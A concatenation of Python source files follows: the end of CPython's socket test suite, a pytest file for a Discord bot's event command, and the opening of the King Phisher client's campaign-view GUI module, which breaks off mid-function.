count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(os_helper.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(TimeoutError, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(os_helper.TESTFN, encoding="utf-8") as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
class TestMacOSTCPFlags(unittest.TestCase):
def test_tcp_keepalive(self):
self.assertTrue(socket.TCP_KEEPALIVE)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest,
SendRecvFdsTests]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.append(BasicBluetoothTest)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
tests.append(TestMacOSTCPFlags)
thread_info = threading_helper.threading_setup()
support.run_unittest(*tests)
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_add_event.py
|
# From https://stackoverflow.com/questions/25827160/importing-correctly-with-pytest
# Change current working directory so test case can find the source files
import sys, os
import asyncio
import discord
import discord.ext.commands as commands
import discord.ext.test as test
import threading
import time
sys.path.append(os.path.realpath(os.path.dirname(__file__) + "/../src"))
import pytest
from datetime import datetime
from functionality.AddEvent import check_complete, add_event # type: ignore
@pytest.fixture
def client(event_loop):
c = discord.Client(loop=event_loop)
test.configure(c)
return c
@pytest.fixture
def bot(request, event_loop):
intents = discord.Intents.default()
intents.members = True
b = commands.Bot(command_prefix="!", loop=event_loop, intents=intents)
@b.command()
async def test_add(ctx):
thread = threading.Thread(target=add_event, args=(ctx, b), daemon=True)
thread.start()
marks = request.function.pytestmark
mark = None
for mark in marks:
if mark.name == "cogs":
break
if mark is not None:
for extension in mark.args:
b.load_extension("tests.internal." + extension)
test.configure(b)
return b
@pytest.mark.asyncio
async def test_add_event(bot):
await test.message("!test_add")
await asyncio.sleep(.25)
def check_variables1():
output = {
"start": False,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": False,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": [],
#"location": "",
}
return output
def check_variables2():
output = {
"start": True,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": False,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": [],
#"location": "None",
}
return output
def check_variables3():
output = {
"start": True,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": True,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": [],
#"location": "None",
}
return output
def check_variables4():
output = {
"start": True,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": True,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": ["Hello"],
#"location": "None",
}
return output
def test_check():
example1 = check_variables1()
example2 = check_variables2()
example3 = check_variables3()
example4 = check_variables4()
assert not (
check_complete(
example1["start"],
example1["start_date"],
example1["end"],
example1["end_date"],
example1["array"],
#example1["location"],
)
)
assert not (
check_complete(
example2["start"],
example2["start_date"],
example2["end"],
example2["end_date"],
example2["array"],
#example1["location"],
)
)
assert check_complete(
example3["start"],
example3["start_date"],
example3["end"],
example3["end_date"],
example3["array"],
#example1["location"],
)
assert check_complete(
example4["start"],
example4["start_date"],
example4["end"],
example4["end_date"],
example4["array"],
#example1["location"],
)
|
campaign.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import errors
from king_phisher import find
from king_phisher import ipaddress
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from king_phisher.client.widget import extras
from king_phisher.client.widget import managers
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import Gtk
from smoke_zephyr.utilities import parse_timespan
UNKNOWN_LOCATION_STRING = 'N/A (Unknown)'
class CampaignViewGenericTab(gui_utilities.GladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
self.loader_thread_stop = threading.Event()
"""The :py:class:`threading.Event` object used to request that the loader thread stop before completion."""
self.application.connect('campaign-set', self.signal_kpc_campaign_set)
def _sync_loader_thread(self):
"""
Synchronize the loader thread by ensuring that it is stopped. If it is
currently running, this will use :py:attr:`~.loader_thread_stop` to
request that the loader stops early.
"""
if not self.loader_thread_is_running:
return
# it's alive so tell it to stop, wait for it, then proceed
self.loader_thread_stop.set()
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.loader_thread.join(1)
@property
def rpc(self):
return self.application.rpc
@property
def loader_thread_is_running(self):
if self.loader_thread is None:
return False
return self.loader_thread.is_alive()
def load_campaign_information(self, force=True):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information()
def signal_destroy(self, gobject):
self.is_destroyed.set()
self.loader_thread_stop.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
def signal_kpc_campaign_set(self, *_):
self.load_campaign_information()
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'button_refresh',
'treeview_campaign'
)
)
node_query = None
"""
The GraphQL query used to load a particular node from the remote table.
This query is provided with a single parameter of the node's id.
"""
table_name = ''
"""The database table represented by this tab."""
table_query = None
"""
The GraphQL query used to load the desired information from the remote
table. This query is provided with the following three parameters:
campaign, count and cursor.
"""
view_columns = ()
"""The dictionary map of column numbers to column names starting at column 1."""
xlsx_worksheet_options = None
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
self.treeview_manager = managers.TreeViewManager(
treeview,
selection_mode=Gtk.SelectionMode.MULTIPLE,
cb_delete=self._prompt_to_delete_row,
cb_refresh=self.load_campaign_information
)
self.treeview_manager.set_column_titles(self.view_columns, column_offset=1)
self.popup_menu = self.treeview_manager.get_popup_menu()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
treeview = self.gobjects['treeview_campaign']
store_columns = [str] * (len(self.view_columns) + 1)
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
self.application.connect('server-connected', self.signal_kp_server_connected)
def signal_kp_server_connected(self, _):
event_id = 'db-' + self.table_name.replace('_', '-')
server_events = self.application.server_events
if not server_events:
return
server_events.subscribe(event_id, ('deleted', 'inserted', 'updated'), ('id', 'campaign_id'))
server_events.connect(event_id, self.signal_server_event_db)
def signal_server_event_db(self, _, event_type, rows):
get_node = lambda id: self.rpc.graphql(self.node_query, {'id': str(id)})['db']['node']
for row in rows:
if str(row.campaign_id) != self.config['campaign_id']:
continue
model = self.gobjects['treeview_campaign'].get_model()
for case in utilities.switch(event_type):
if case('inserted'):
row_data = self.format_node_data(get_node(row.id))
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row.id))
gui_utilities.glib_idle_add_wait(model.append, row_data)
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
if ti is None:
self.logger.warning("received server db event: {0} for non-existent row {1}:{2}".format(event_type, self.table_name, str(row.id)))
break
if case('deleted'):
model.remove(ti)
break
if case('updated'):
row_data = self.format_node_data(get_node(row.id))
for idx, cell_data in enumerate(row_data, 1):
model[ti][idx] = self.format_cell_data(cell_data)
break
def _export_lock(self):
show_dialog_warning = lambda: gui_utilities.show_dialog_warning('Export Failed', self.parent, 'Can not export data while loading.')
if not self.loader_thread_lock.acquire(False):
show_dialog_warning()
return False
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.loader_thread_lock.release()
show_dialog_warning()
return False
return True
def _prompt_to_delete_row(self, treeview, _):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
model = treeview.get_model()
row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)]
if len(row_ids) == 0:
return
elif len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
self.application.emit(self.table_name[:-1] + '-delete', row_ids)
def format_node_data(self, node):
"""
This method is overridden by subclasses to format the raw node
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each node in the remote table by the loader thread.
:param dict node: The node from a GraphQL query representing data for this table.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data, encoding='utf-8'):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_row_data` function. Values are converted into
a format suitable for reading.
:param cell: The value to format.
:param str encoding: The encoding to use to coerce the return value into a unicode string.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data, encoding=encoding)
if cell_data is None:
cell_data = ''
elif isinstance(cell_data, int):
cell_data = str(cell_data)
# ensure that the return value is a unicode string
if isinstance(cell_data, bytes):
cell_data = cell_data.decode(encoding)
return cell_data
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
store = self.gobjects['treeview_campaign'].get_model()
store.clear()
self.loader_thread = utilities.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
campaign_id = self.config['campaign_id']
count = 500
page_info = {'endCursor': None, 'hasNextPage': True}
while page_info['hasNextPage']:
if self.rpc is None:
break
try:
